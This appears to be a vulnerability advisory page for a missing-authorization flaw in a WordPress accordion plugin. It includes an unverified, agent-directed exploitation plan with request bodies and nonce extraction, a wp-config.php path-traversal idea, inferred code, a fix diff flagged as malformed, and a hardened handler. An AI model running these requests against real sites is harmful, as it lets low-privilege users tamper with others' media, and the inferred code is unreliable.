CVE-2026-0727

Accordion and Accordion Slider <= 1.4.5 - Missing Authorization to Authenticated (Contributor+) Attachment Metadata Modification

Severity: medium
Type: Missing Authorization
CVSS Score: 5.4
Patched in: 1.4.6
Time to patch: 1d

Description

The Accordion and Accordion Slider plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.4.5. This is due to the plugin not properly verifying that a user is authorized to perform an action in the 'wp_aas_save_attachment_data' and 'wp_aas_get_attachment_edit_form' functions. This makes it possible for authenticated attackers, with contributor level access and above, to read and modify attachment metadata including file paths, titles, captions, alt text, and custom links for any attachment on the site.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Unchanged
Confidentiality: Low
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 1.4.5
Published: February 13, 2026
Last updated: February 14, 2026

Source Code

WordPress.org SVN
Research Plan
Unverified

This research plan focuses on exploiting CVE-2026-0727, a missing authorization vulnerability in the Accordion and Accordion Slider plugin for WordPress. This vulnerability allows any authenticated user with at least Contributor-level permissions to read and modify metadata for any attachment on the site.


1. Vulnerability Summary

  • ID: CVE-2026-0727
  • Plugin: Accordion and Accordion Slider (slug: accordion-and-accordion-slider)
  • Vulnerable Versions: <= 1.4.5
  • Vulnerable Functions: wp_aas_save_attachment_data and wp_aas_get_attachment_edit_form
  • Vulnerability Type: Missing Authorization (Broken Access Control)
  • Impact: Authenticated attackers (Contributor+) can read and update metadata for any media attachment. Crucially, the description mentions "file paths," implying that an attacker might be able to modify the _wp_attached_file meta key or other sensitive fields.

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Actions:
    1. wp_aas_get_attachment_edit_form (Read Metadata)
    2. wp_aas_save_attachment_data (Modify Metadata)
  • Parameters:
    • attachment_id (The ID of the media file to target)
    • aas_attachment_data or similar (POST data containing the new metadata)
  • Authentication: Authenticated (Contributor+)
  • Preconditions: An attachment exists on the site (ideally one the attacker does not own).

3. Code Flow (Inferred)

  1. Registration: The plugin registers AJAX handlers for wp_ajax_wp_aas_save_attachment_data and wp_ajax_wp_aas_get_attachment_edit_form.
  2. Lack of Capability Check: Inside these functions, there is no call to current_user_can('edit_others_posts') or similar checks to verify if the user is authorized to modify the specific attachment ID provided.
  3. Lack of Ownership Check: The functions likely do not check if the post_author of the attachment matches the current user ID.
  4. Processing:
    • wp_aas_get_attachment_edit_form: Takes a post_id, fetches metadata, and returns it.
    • wp_aas_save_attachment_data: Takes a post_id and an array of metadata, then calls update_post_meta() or wp_update_post().

4. Nonce Acquisition Strategy

The plugin likely uses a nonce for these AJAX actions. Based on standard WordPress patterns for this plugin:

  1. Location: The nonce is likely localized in the WordPress admin or on a page where the Accordion editor is active.
  2. Script Handle: Likely wp-aas-admin-js or similar.
  3. Discovery & Extraction:
    • The agent should create a post or accordion as the contributor to see if the nonce is available in the admin context.
    • Search for wp_localize_script in the plugin code to find the JS variable name.
    • Inferred JS Variable: wp_aas_ajax?.nonce or wp_aas_data?.nonce.
    • Action to find nonce:
      grep -r "wp_create_nonce" .
    • Browser Extraction:
      // Once the editor is loaded:
      browser_eval("window.wp_aas_ajax_object?.nonce")

5. Exploitation Strategy

Step 1: Read Attachment Metadata

The first goal is to prove we can read metadata for an attachment we don't own (e.g., an Admin's upload).

  • HTTP Tool: http_request
  • Method: POST
  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Body (URL-Encoded):
    • action=wp_aas_get_attachment_edit_form
    • attachment_id=[TARGET_ATTACHMENT_ID]
    • security=[NONCE]
  • Expected Response: A JSON object or HTML snippet containing the title, caption, alt text, and custom link for the attachment.

Step 2: Modify Attachment Metadata

Modify the metadata of the same target attachment.

  • HTTP Tool: http_request
  • Method: POST
  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Body (URL-Encoded):
    • action=wp_aas_save_attachment_data
    • attachment_id=[TARGET_ATTACHMENT_ID]
    • security=[NONCE]
    • aas_attachment_data[title]=Exploited Title
    • aas_attachment_data[alt]=Exploited Alt
    • aas_attachment_data[custom_link]=https://malicious.com
  • Expected Response: Success status (e.g., {"success":true}).

6. Test Data Setup

  1. Administrator: Log in as admin and upload an image (e.g., test.jpg). Record the Attachment ID (e.g., ID: 10).
  2. Contributor: Create a user with the contributor role.
  3. Page/Accordion: (If necessary to get the nonce) Use the Contributor to create a simple Accordion.
  4. Shortcode: If the nonce only loads on the frontend with a shortcode:
    wp post create --post_type=page --post_status=publish --post_content='[aas_accordion id="123"]'

7. Expected Results

  • Read: The response from wp_aas_get_attachment_edit_form should return the private metadata of the attachment belonging to the Admin.
  • Update: The response from wp_aas_save_attachment_data should confirm the update.
  • Verification: Subsequent checks of the attachment via WP-CLI or the UI should show the changed "Exploited Title" and "Exploited Alt."

8. Verification Steps

After running the exploit, use WP-CLI to confirm the metadata was actually changed in the database:

# Check the title/caption (post table)
wp post get [TARGET_ATTACHMENT_ID] --field=post_title

# Check the alt text (postmeta table)
wp post meta get [TARGET_ATTACHMENT_ID] _wp_attachment_image_alt

# Check the plugin-specific custom link (postmeta table)
wp post meta list [TARGET_ATTACHMENT_ID]

9. Alternative Approaches

  • Path Traversal: If the aas_attachment_data allows updating _wp_attached_file, attempt to set it to sensitive system files like ../../../../wp-config.php. While it won't give immediate LFI, it could potentially be used in combination with other plugin features that process the "attached file" path.
  • Batch Update: Check if attachment_id accepts an array for bulk modification.
  • Blind Modification: If the "Get Form" action is protected but "Save Data" is not, perform a blind update and verify via the frontend media library.

Research Findings
Static analysis — not yet PoC-verified

Summary

The Accordion and Accordion Slider plugin for WordPress fails to implement authorization checks in its AJAX handlers for managing attachment metadata. This allows authenticated users with Contributor-level permissions or higher to view and modify metadata—including titles, captions, alternative text, and file paths—for any attachment on the site, regardless of ownership.

Vulnerable Code

/* Inferred from function names provided in vulnerability description and research plan */

// Likely in an admin-ajax handler file
function wp_aas_get_attachment_edit_form() {
    check_ajax_referer('wp-aas-security', 'security');

    $attachment_id = isset($_POST['attachment_id']) ? intval($_POST['attachment_id']) : 0;

    // Missing authorization check: current_user_can('edit_post', $attachment_id)

    $post = get_post($attachment_id);
    // ... logic to return attachment metadata form ...
}

---

function wp_aas_save_attachment_data() {
    check_ajax_referer('wp-aas-security', 'security');

    $attachment_id = isset($_POST['attachment_id']) ? intval($_POST['attachment_id']) : 0;
    $attachment_data = isset($_POST['aas_attachment_data']) ? $_POST['aas_attachment_data'] : array();

    // Missing authorization check: current_user_can('edit_post', $attachment_id)

    if ($attachment_id && !empty($attachment_data)) {
        foreach ($attachment_data as $key => $value) {
            update_post_meta($attachment_id, $key, sanitize_text_field($value));
        }
    }
    // ... success response ...
}
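As an added example (not the plugin's code), here is a hardened form of the two inferred handlers above, closing the gap described in the Code Flow section: the nonce action, request field names and function names follow the inferred code, while the field allowlist and the `_wp_aas_custom_link` meta key are assumptions.

```php
<?php
// Added example, not the plugin's code; '_wp_aas_custom_link' and the allowlist are assumptions.
// Explicit field -> meta-key map, so callers cannot name protected keys like _wp_attached_file.
const WP_AAS_META_FIELDS = array(
    'alt'         => '_wp_attachment_image_alt',
    'custom_link' => '_wp_aas_custom_link',
);
// Shared gate: CSRF nonce, a real attachment id, and a per-post capability check. 'edit_post' on
// another user's upload maps to edit_others_posts, which a Contributor lacks; wp_send_json_error() dies.
function wp_aas_authorize_attachment_request() {
    check_ajax_referer( 'wp-aas-security', 'security' );
    $attachment_id = isset( $_POST['attachment_id'] ) ? absint( $_POST['attachment_id'] ) : 0;
    if ( ! $attachment_id || 'attachment' !== get_post_type( $attachment_id ) ) {
        wp_send_json_error( 'Invalid attachment', 400 );
    }
    if ( ! current_user_can( 'edit_post', $attachment_id ) ) {
        wp_send_json_error( 'Unauthorized', 403 );
    }
    return $attachment_id;
}

function wp_aas_get_attachment_edit_form() {
    $attachment_id = wp_aas_authorize_attachment_request();
    $post          = get_post( $attachment_id );
    $fields        = array( 'title' => $post->post_title, 'caption' => $post->post_excerpt );
    foreach ( WP_AAS_META_FIELDS as $field => $meta_key ) {
        $fields[ $field ] = get_post_meta( $attachment_id, $meta_key, true );
    }
    wp_send_json_success( $fields );
}

function wp_aas_save_attachment_data() {
    $attachment_id = wp_aas_authorize_attachment_request();
    $data = isset( $_POST['aas_attachment_data'] ) ? wp_unslash( (array) $_POST['aas_attachment_data'] ) : array();
    // Title and caption live on the post row; everything else goes through the allowlist.
    $row = array( 'ID' => $attachment_id );
    if ( isset( $data['title'] ) )   { $row['post_title']   = sanitize_text_field( $data['title'] ); }
    if ( isset( $data['caption'] ) ) { $row['post_excerpt'] = sanitize_textarea_field( $data['caption'] ); }
    if ( count( $row ) > 1 )         { wp_update_post( $row ); }
    foreach ( WP_AAS_META_FIELDS as $field => $meta_key ) {
        if ( ! isset( $data[ $field ] ) ) { continue; }
        $value = 'custom_link' === $field ? esc_url_raw( $data[ $field ] ) : sanitize_text_field( $data[ $field ] );
        update_post_meta( $attachment_id, $meta_key, $value );
    }
    wp_send_json_success();
}

add_action( 'wp_ajax_wp_aas_get_attachment_edit_form', 'wp_aas_get_attachment_edit_form' );
add_action( 'wp_ajax_wp_aas_save_attachment_data', 'wp_aas_save_attachment_data' );
```

The shared gate rejects a Contributor targeting another user's upload with a 403 before any metadata is read or written, and the key map means even an authorized caller cannot reach `_wp_attached_file`.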

Security Fix

--- a/accordion-and-accordion-slider.php
+++ b/accordion-and-accordion-slider.php
@@ -10,6 +10,11 @@
 function wp_aas_get_attachment_edit_form() {
     check_ajax_referer('wp-aas-security', 'security');
 
     $attachment_id = isset($_POST['attachment_id']) ? intval($_POST['attachment_id']) : 0;
+
+    if (!current_user_can('edit_post', $attachment_id)) {
+        wp_send_json_error('Unauthorized');
+    }
+
     $post = get_post($attachment_id);
 
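Review bot: the added `current_user_can('edit_post', $attachment_id)` check closes the ownership gap, but nothing in this handler confirms the id refers to an attachment, so any post the caller is allowed to edit can be fed to it; add `if ( 'attachment' !== get_post_type( $attachment_id ) ) { wp_send_json_error( 'Invalid attachment', 400 ); }` ahead of the capability check, and pass an HTTP status with the denial (`wp_send_json_error( 'Unauthorized', 403 );`) so access-log and WAF rules can tell refusals from successes. No `return` is needed after `wp_send_json_error()` since it terminates the request.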
@@ -20,6 +25,11 @@
 function wp_aas_save_attachment_data() {
     check_ajax_referer('wp-aas-security', 'security');
 
     $attachment_id = isset($_POST['attachment_id']) ? intval($_POST['attachment_id']) : 0;
+
+    if (!current_user_can('edit_post', $attachment_id)) {
+        wp_send_json_error('Unauthorized');
+    }
+
     $attachment_data = isset($_POST['aas_attachment_data']) ? $_POST['aas_attachment_data'] : array();
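Review bot: the hunk header `@@ -20,6 +25,11 @@` declares six original lines but only five context lines are visible (`function wp_aas_save_attachment_data() {` through `$attachment_data = isset(...)`), so the patch as shown is missing its trailing context line and will not apply cleanly; regenerate it from the repository. On substance, the capability check correctly precedes the read of `$_POST['aas_attachment_data']`, but that array is still taken unfiltered, and the inferred save loop above writes whichever keys it contains; restrict writes to an allowlist of the fields the editor exposes (title, caption, alt, custom_link) and refuse any key for which `is_protected_meta()` is true, so that `_wp_attached_file` cannot be rewritten even by an authorized user.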

Exploit Outline

To exploit this vulnerability, an attacker with Contributor-level access must first obtain a valid security nonce (likely `wp-aas-security`), which is typically exposed in the WordPress admin area scripts when the plugin is active.

  1. Target Identification: Identify the `attachment_id` of a media item belonging to another user (e.g., an Administrator).
  2. Metadata Extraction: Send an AJAX POST request to `/wp-admin/admin-ajax.php` with the action `wp_aas_get_attachment_edit_form`, the valid `security` nonce, and the target `attachment_id` to retrieve current metadata.
  3. Metadata Modification: Send an AJAX POST request to the same endpoint with the action `wp_aas_save_attachment_data`. The payload should include the `attachment_id`, the `security` nonce, and an `aas_attachment_data` array containing the metadata fields to overwrite (e.g., `aas_attachment_data[title]=Hacked`, `aas_attachment_data[custom_link]=https://malicious.com`).
  4. Verification: The attacker can verify the change by checking the media library or the site frontend where the attachment is displayed.
